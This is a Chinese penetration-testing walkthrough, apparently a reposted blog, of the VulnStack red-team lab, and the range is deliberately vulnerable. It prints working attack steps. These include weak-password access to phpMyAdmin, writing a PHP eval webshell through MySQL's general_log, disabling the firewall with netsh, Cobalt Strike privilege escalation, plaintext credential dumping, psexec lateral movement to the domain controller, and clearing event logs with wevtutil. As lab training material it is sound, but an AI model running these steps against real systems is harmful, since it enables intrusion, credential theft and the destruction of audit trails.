【渗透测试】ATTCK靶场一,phpmyadmin,域渗透,内网横向移动攻略

news2024/11/15 22:26:45

前言

博客主页:h0ack1r丶羽~ 从0到1~

img

VulnStack,作为红日安全团队匠心打造的知识平台,其独特优势在于全面模拟了国内企业的实际业务场景,涵盖了CMS、漏洞管理及域管理等核心要素。这一设计理念源于红日安全团队对ATT&CK红队评估设计模式的深刻理解和巧妙应用。靶场环境的构建与题目设计均围绕环境搭建、漏洞利用、内网信息搜集、横向移动、渗透通道构建、持久控制及痕迹清理等多维度展开,旨在为安全研究者打造一个真实且全面的内网渗透学习环境。如果哪里出错了,还请师傅们指出,内容仅供参考,不喜勿喷,感谢。

image-20240821152514635

环境准备

下载链接:漏洞详情icon-default.png?t=N7T8http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

红日一的靶机一共有三台机器

image-20240825180544741

网络拓扑结构

image-20240826203050580

首先修改虚拟网络编辑器为仅主机的网卡为52段

image-20240825181906416

win7外网主机添加一块网卡,用于模拟公网服务器

image-20240825180340463

启动后配置本地连接为自动获取ip,它默认设的静态不是我们的主机net模式,就无法上网,甚至访问不了主机

image-20240825190253174

win2008为域控主机,配置如下,将net模式修改为仅主机

image-20240825185419014

win2003为域成员

image-20240825185346961

启动环境

登录密码:hongrisec@2019,三台密码都是一样的,如果登录后要你重新修改密码,那么三台机器都是你修改之后的密码,账户名都为Administrator

win7启动web服务即可开始渗透了

image-20240825182955011

信息收集

nmap使用教程:内网隐蔽扫描,Nmap基础-高级用法

发现主机129

image-20240825190730900

再对他进行nmap端口扫描,发现端口80和3306开放的mysql端口

image-20240825204056292

访问靶机地址,里面包含了系统的phpstudy网站的绝对路径和管理员邮箱,还有远程文件包含函数的打开

image-20240825205800234

下滑还发现一个mysql检测

image-20240825204600941

默认弱口令root/root,即可测试登录成功

image-20240825204507622

我们用kali自带的目录扫描器dirb,扫到如下内容

Tips : 【kali笔记】一款强大的Web目录扫描工具DIRB使用指南

dirb http://192.168.209.129/

image-20240825205221559

一个一个访问寻找可用的信息,phpinfo.php,php版本5.4.45

image-20240825205250250

还有一个phpmyadmin,用刚刚的弱口令登陆即可

image-20240825205929192

web渗透

进入后台,发现mysql不允许向外部写文件,没有拿到系统权限之前我们也修改不了这个文件写入的路径

show variables like "secure%";

image-20240825210448226

那么就用第二种方式,日志写入

show variables like "%general%";

image-20240825210959778

我们用的是root账户属于DBA用户,这个时候我们就能直接修改日志路径为当前网站的根目录,并创建一个shell.php,写入一句话木马,注意,这里的写入实际上写的是日志文件,而不是向外部写文件,所以不需要secure_file_priv的参数为" "

set global general_log="on";
set global general_log_file="C:/phpStudy/WWW/shell.php";

image-20240825211343019

image-20240825211810962

向日志写入一句话木马,就可以上线成功

select "<?php @eval($_POST[10]); ?>";

image-20240825212007099

访问日志shell.php

image-20240825212029722

蚁剑连接

image-20240825212513078

cs生成木马

image-20240826095022977

上传木马

image-20240826095002637

执行木马即可上线

Tips : 内网渗透利器,Cobal_Strike汉化使用指南

image-20240826095357984

关闭防火墙,在这里关不关都无所谓

shell netsh advfirewall set allprofiles state off 

image-20240826102218271

权限提升

查看权限信息,是超级管理员

getuid

image-20240826102326253

权限提升

image-20240826175423707

选择监听模块为你kali服务器地址

image-20240826102730859

一个个尝试,选项xvc-exe提权

image-20240826102718739

提权到系统权限成功

image-20240826102807476

内网信息收集

查看ip地址

shell ipconfig

image-20240826101605862

显示所有系统用户

shell net user

image-20240826104041192

列举计算机名

shell net view

image-20240826104117216

判断是否存在域

shell net config Workstation

image-20240826104150641

查看有几个域,结果为GOD一个

shell net view  /domain

image-20240826104223609

利用跳板机进行端口扫描

image-20240826104343788

指定为该主机的另一个网卡,可以使用arp扫描也可以使用icmp扫描

image-20240826104404290

发现两台主机

image-20240826104735899

且都开放了445端口

image-20240826105845825

抓取明文密码

image-20240826104857388

内网横向

刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道(Windows上的SMB(Server Message Block)协议是一种网络文件共享协议,它允许用户在网络上的计算机之间访问文件和打印机等资源。)

新建监听器

image-20240826110021520

image-20240826110218245

以列表形式展示目标

image-20240826110735862

找到刚刚扫描出来的域控主机,进行横向移动,选择psexec选项

image-20240826110820766

配置如下

image-20240826110922975

这时候就可以拿到域控服务器

image-20240826111327199

另外一台内网主机也是这样,因为他们都处于同域下

image-20240826140657871

清除日志,注意,多执行几次,有些时候可能清理不干净

shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

image-20240826173556830

或者直接使用插件

image-20240826173733111

image-20240826173747058

网络拓扑图已全部是上线

image-20240826183227480

总结

我成功上线了3台靶机,hhhhhhh,师傅们点点赞,蟹蟹

202408262019441 (1)

感今怀昔

最新可用,bp+charles小程序抓包教程

【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS

内网渗透利器,Cobal_Strike汉化使用指南

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2078425.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

VBA之正则表达式(47)-- 快速将公式转换为静态值计算

实例需求&#xff1a;工作表I列包含多种计算公式&#xff0c;为了便于演示&#xff0c;将I列公式显示在J列单元格中&#xff0c;现在需要将公式的单元格引用转换为静态值&#xff0c;如K列所示。 示例代码如下。 Sub RegExpDemoReplace()Dim Res()Dim objRegEx As ObjectDim o…

零基础5分钟上手亚马逊云科技-NLP文字理解AI服务

简介&#xff1a; 欢迎来到小李哥全新亚马逊云科技AWS云计算知识学习系列&#xff0c;适用于任何无云计算或者亚马逊云科技技术背景的开发者&#xff0c;通过这篇文章大家零基础5分钟就能完全学会亚马逊云科技一个经典的服务开发架构方案。 我会每天介绍一个基于亚马逊云科技…

android gradle 配置国内gradle地址

1. 地址&#xff1a; 腾讯云镜像 Gradle下载地址&#xff1a;https://mirrors.cloud.tencent.com/gradle/ 阿里云镜像 Gradle下载地址&#xff1a;https://mirrors.aliyun.com/macports/distfiles/gradle/ 阿里云镜像 Gradle下载地址&#xff1a;https://mirrors.aliyun.com…

Python酷库之旅-第三方库Pandas(102)

目录 一、用法精讲 441、pandas.DataFrame.mask方法 441-1、语法 441-2、参数 441-3、功能 441-4、返回值 441-5、说明 441-6、用法 441-6-1、数据准备 441-6-2、代码示例 441-6-3、结果输出 442、pandas.DataFrame.query方法 442-1、语法 442-2、参数 442-3、功…

【C++题解】1223. 汉诺塔的移动次数

欢迎关注本专栏《C从零基础到信奥赛入门级&#xff08;CSP-J&#xff09;》 问题&#xff1a;1223. 汉诺塔的移动次数 类型&#xff1a;函数、递归基础 题目描述&#xff1a; 汉诺塔的问题大家都已经很熟悉了&#xff0c;有三个柱子&#xff0c;每个柱子上有一些大小不一的金…

Python(C)图像压缩导图

&#x1f3af;要点 傅里叶和小波变换主成分分析彩色图压缩制作不同尺寸图像K均值和生成式对抗网络压缩无损压缩算法压缩和解压缩算法离散小波变换压缩树结构象限算法压缩矩阵分解有损压缩算法量化模型有损压缩算法JPEG压缩解压缩算法 Python图像压缩 图像压缩可以是有损的&…

Gazebo Harmonic gz-harmonic 和 ROS2 Jazzy 注意事项

激光显示 点呈现 射线呈现 rviz2 新旧版本并存的混乱 本教程旨在为在Ubuntu Jammy&#xff08;最新支持Gazebo Classic包的Ubuntu版本&#xff09;上运行Gazebo Classic&#xff08;如Gazebo 11&#xff09;的用户提供指导&#xff0c;这些用户计划将其代码迁移到新的Gazebo版…

大语言模型(LLMs)全面学习指南

大语言模型&#xff08;LLMs&#xff09;作为人工智能&#xff08;AI&#xff09;领域的一项突破性发展&#xff0c;已经改变了自然语言处理&#xff08;NLP&#xff09;和机器学习&#xff08;ML&#xff09;应用的面貌。这些模型&#xff0c;包括OpenAI的GPT-4o和Google的gem…

泛运动生态持续破圈,重估Keep时刻来临

在中国超40万亿的庞大消费市场中&#xff0c;从不缺少“燃点”。 前不久举办的巴黎奥运会&#xff0c;就带火了国内规模空前的“奥运经济”。在诸多品牌助力下&#xff0c;这股运动消费热潮持续破圈。 比如&#xff0c;运动科技公司Keep通过发布主题为《心火已燃》的品牌TVC&…

生信圆桌x生信友好期刊:助力生物信息学研究的学术平台

介绍 生物信息学作为一门交叉学科&#xff0c;近年来得到了快速发展。为了促进生信领域的科研交流&#xff0c;许多学术期刊开始关注并专门发表生物信息学相关的研究成果。这些期刊被称为“生信友好期刊”&#xff0c;它们为研究人员提供了一个展示和传播最新科研成果的重要平…

怎么成为ChatGPT使用大神?

成为高效使用ChatGPT的高手&#xff0c;可以通过以下几个方面来提升你的使用体验和效果&#xff1a; 1. 清晰明确的提问 明确问题&#xff1a;尽量将问题表述清楚、具体。例如&#xff0c;“如何提高文章写作技巧&#xff1f;” 比 “写作技巧” 更具体。提供上下文&#xf…

UnrealEngine学习(01):安装虚幻引擎

1. 下载安装 Epic Games 目前下载UE引擎需要先下载Epic Games&#xff0c;官网为我们提供了下载路径&#xff1a; https://www.unrealengine.com/zh-CN/downloadhttps://www.unrealengine.com/zh-CN/download 我们点击图中步骤一即可进行下载。 注释&#xff1a;Unreal Engi…

AI嵌入式开发 ---- pt模型文件 -> ONNX模型 -> rknn模型 -> 部署到RK3588开发板上(以yolov5为例)

目录 一、前言 1.1 任务 1.2 开发板下跑预训练模型流程 二、pt 文件转换为 onnx 或 TorchScript 文件&#xff08;平台&#xff1a;x86机器Windows系统&#xff09; 二、将 .onnx 模型文件转换为 .rknn 模型文件【平台&#xff1a;x86上的 Linux虚拟系统】 三、在 Linux虚…

python爬虫控制aiohttp并发数量方式例子解析

在使用Python的aiohttp库进行爬虫开发时&#xff0c;控制并发数量是一个重要的环节&#xff0c;以避免对目标网站造成过大压力或触发反爬机制。以下是一些控制并发数量的方法和示例&#xff1a; 使用Semaphore限制并发数&#xff1a;Semaphore&#xff08;信号量&#xff09;是…

用大模型学习大模型-40问掌握大模型入门知识点(上)

采用提问方式&#xff0c;从个人知识盲点开始&#xff0c;渐进式掌握大模型入门知识点。‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍ 1、大模型中7b、70B代表什么 在讨论人工智能领域特别是大型语言模型&#xff08;LLMs&#xff09;时&#xff0c;“7b”和“70B”均…

【Kotlin设计模式】Kotlin实现装饰器模式

前言 装饰器模式&#xff08;Decorator Pattern&#xff09;&#xff0c;用于动态地为对象添加新功能&#xff0c;而无需修改其结构&#xff0c;通过使用不用装饰类及这些装饰类的排列组合&#xff0c;可以实现不同的功能和效果&#xff0c;但是这样的效果就是会增加很多类&…

debian12 - rsyslog的安装/配置/使用

文章目录 debian12 - rsyslog的安装/配置/使用概述笔记实现main.cppmy_syslog.hmy_syslog.cppMakefileMakefile的准备工作END debian12 - rsyslog的安装/配置/使用 概述 以前在debian7.5中用syslog可以。 现在准备在debian12虚拟机中做个rsyslog的实验&#xff0c;看syslog还…

2024年PDF转换成PPT三步走,职场小白秒变高手

这个信息满天飞的时代&#xff0c;我们几乎天天都得处理一堆文件&#xff0c;PDF和PPT这对搭档简直就是我们工作学习中的老面孔。你有没有碰到过这种头疼事&#xff1a;急着要把PDF转成PPT来准备个演讲&#xff0c;但就是找不到个又快又好使的招&#xff1f;别慌&#xff0c;今…

一文搞懂大模型!基础知识、 LLM 应用、 RAG 、 Agent 与未来发展

LLM 探秘&#xff1a;想要深入了解人工智能界的“新宠”大型语言模型&#xff08;LLM&#xff09;吗&#xff1f;本文将带你走进 LLM 的世界&#xff0c;从入门知识到实际应用&#xff0c;全方位解读这个充满魔力的“大模型”。我们将一起揭开 LLM 的神秘面纱&#xff0c;领略其…

代码随想录算法训练营第三十九天 | 198.打家劫舍 , 213.打家劫舍II , 337.打家劫舍III

目录 198.打家劫舍 思路 1.确定dp数组&#xff08;dp table&#xff09;以及下标的含义 2.确定递推公式 3.dp数组如何初始化 4.确定遍历顺序 5.举例推导dp数组 方法一&#xff1a; 动态规划-一维 方法二&#xff1a;动态规划-二维 方法三&#xff1a;动态规划-两个变…